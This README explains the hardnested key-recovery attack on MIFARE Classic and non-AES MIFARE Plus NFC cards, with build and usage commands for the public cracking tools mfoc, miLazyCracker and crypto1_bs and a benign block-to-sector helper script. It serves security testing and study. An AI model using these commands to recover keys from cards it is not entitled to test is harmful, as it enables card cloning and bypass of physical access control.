└── README.md

/README.md:
--------------------------------------------------------------------------------
# Hardnested attack

### Works on
New MIFARE Classic and MIFARE Plus without AES (note that AES is disabled by default)

### Attack

1. Collect 2000-4000 nonces with an NFC card reader. The speed of nonce collection depends on the reader.

2. Analyze the nonces collected in step 1 in order to reduce the original key space of 2^48.

3. Offline brute force.

### Software

Before using other methods, always try **mfoc** first, since it is the fastest and easiest method if the card is vulnerable to the nested attack.

```bash
$ git clone https://github.com/nfc-tools/mfoc
$ cd mfoc
$ autoreconf -vfi
$ ./configure
$ make
$ sudo make install
```

If mfoc shows "Card is not vulnerable to nested attack", you have to use the hardnested attack.
You can do this with an automatic tool, or manually.

#### Automatic method

```bash
# Installation
$ git clone https://github.com/nfc-tools/miLazyCracker
$ cd miLazyCracker
$ ./miLazyCrackerFreshInstall.sh

# Run with a USB NFC card reader connected
$ miLazyCracker
```

#### Manual method

```bash
# Installation
$ git clone https://github.com/aczid/crypto1_bs
$ cd crypto1_bs
$ make get_craptev1
$ make get_crapto1
$ make
$ sudo make install

# Usage
$ libnfc_crypto1_crack

# Example
# Note that the arguments are block numbers, not sector numbers: block 20 is in sector 5, and block 24 is in sector 6
$ libnfc_crypto1_crack 0123456789ab 20 B 24 B
```
--------------------------------------------------------------------------------
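The manual method takes block numbers rather than sector numbers, so it helps to be able to convert between the two. The helpers below are an added example, not part of the original README or of crypto1_bs. The function names are hypothetical, and the layout is assumed from the public MIFARE Classic memory map (sectors 0-31 hold 4 blocks each, sectors 32-39 on 4K cards hold 16 blocks each).

```bash
#!/usr/bin/env bash
# Added example: MIFARE Classic block <-> sector arithmetic.
# Assumed layout: sectors 0-31 = 4 blocks each (1K cards stop at sector 15),
#                 sectors 32-39 = 16 blocks each (4K cards only).

# Accept plain decimal integers only (no sign, no leading zeros).
is_uint() {
    case $1 in ''|*[!0-9]*|0?*) return 1 ;; esac
}

# Print the sector that contains absolute block number $1.
sector_of_block() {
    is_uint "$1" || { echo "invalid block: $1" >&2; return 1; }
    if [ "$1" -lt 128 ]; then
        echo $(( $1 / 4 ))
    elif [ "$1" -lt 256 ]; then
        echo $(( 32 + ($1 - 128) / 16 ))
    else
        echo "block out of range: $1" >&2; return 1
    fi
}

# Print the first absolute block number of sector $1.
first_block_of_sector() {
    is_uint "$1" || { echo "invalid sector: $1" >&2; return 1; }
    if [ "$1" -lt 32 ]; then
        echo $(( $1 * 4 ))
    elif [ "$1" -lt 40 ]; then
        echo $(( 128 + ($1 - 32) * 16 ))
    else
        echo "sector out of range: $1" >&2; return 1
    fi
}

# Print the sector trailer (last block of sector $1; it stores key A,
# the access bits and key B).
trailer_block_of_sector() {
    first=$(first_block_of_sector "$1") || return 1
    if [ "$1" -lt 32 ]; then echo $(( first + 3 )); else echo $(( first + 15 )); fi
}

# The two block numbers used in the README's example command.
for b in 20 24; do
    s=$(sector_of_block "$b")
    echo "block $b -> sector $s (blocks $(first_block_of_sector "$s")-$(trailer_block_of_sector "$s"))"
done
```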